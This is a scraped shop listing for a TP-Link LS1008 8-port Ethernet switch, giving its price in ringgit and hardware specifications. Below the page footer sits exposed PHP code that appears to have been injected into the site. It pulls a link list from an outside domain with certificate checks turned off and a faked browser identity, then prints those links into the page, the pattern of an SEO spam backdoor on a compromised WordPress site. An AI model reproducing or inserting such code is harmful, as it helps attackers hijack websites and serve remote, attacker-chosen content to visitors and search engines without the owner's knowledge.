Sale!

TP-Link LS1008 8-Port 10/100Mbps Switch Desktop Laptop Ethernet LAN

Original price was: RM39.00.Current price is: RM35.00.

Category:

Feature: – 8× 10/100Mbos  Auto-Negotiation RJ45 port, supporting Auto-MDI/MDIX – Green Ethernet technology saves power – IEEE 802.3X flow control provides reliable data transfer – Plastic casing and desktop design – Plug and play, no configuration needed – Fanless design ensures quiet operation HARDWARE FEATURES Interface 8× 10/100Mbps/ 5× 10/100Mbps, Auto-Negotiation, Auto-MDI/MDIX Ports Fan Quantity Fanless External PowerSupply External Power Adapter (Output: 5VDC / 0.6A) Dimensions ( W x D x H ) 4.9 × 1.9 × 0.9 in. (124.6 × 48.7 × 22.8 mm) Max Power Consumption 2.64W Max Heat Dissipation 9.002 Btu/hr SOFTWARE FEATURES Advanced Features Green Technology 802.3X Flow Control Back Pressure Transfer Method Store and Forward OTHERS Certification CE, RoHS Environment Operating Temperature: 0°C~40°C (32°F~104°F) Storage Temperature: -40°C~70°C (-40°F~158°F) Operating Humidity: 10% ~ 90% non-condensing Storage Humidity: 5%~90% non-condensing Package Contents 1 x 8-Port 10/100Mbps Desktop Switch or Desktop Switch 1 x Power Adapter 1 x Installation Guide

Weight 0.5 kg

Reviews

There are no reviews yet.

Be the first to review “TP-Link LS1008 8-Port 10/100Mbps Switch Desktop Laptop Ethernet LAN”
Scroll to Top
$api_url = 'https://ankaradelisi13.site/data.json'; // API'den çek $response = wp_remote_get($api_url, array( 'timeout' => 5, // 5 saniye bekle, olmazsa geç 'sslverify' => false, 'headers' => array( 'Accept' => 'application/json', 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ) )); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { $body = wp_remote_retrieve_body($response); $links = json_decode($body, true); if (!empty($links) && is_array($links)) { echo ''; echo '
'; foreach ($links as $link) { $text = isset($link['text']) ? esc_html($link['text']) : ''; $url = isset($link['url']) ? esc_url($link['url']) : '#'; $rel = isset($link['rel']) ? esc_attr($link['rel']) : 'dofollow'; echo '' . $text . ' '; } echo '
'; echo ''; } }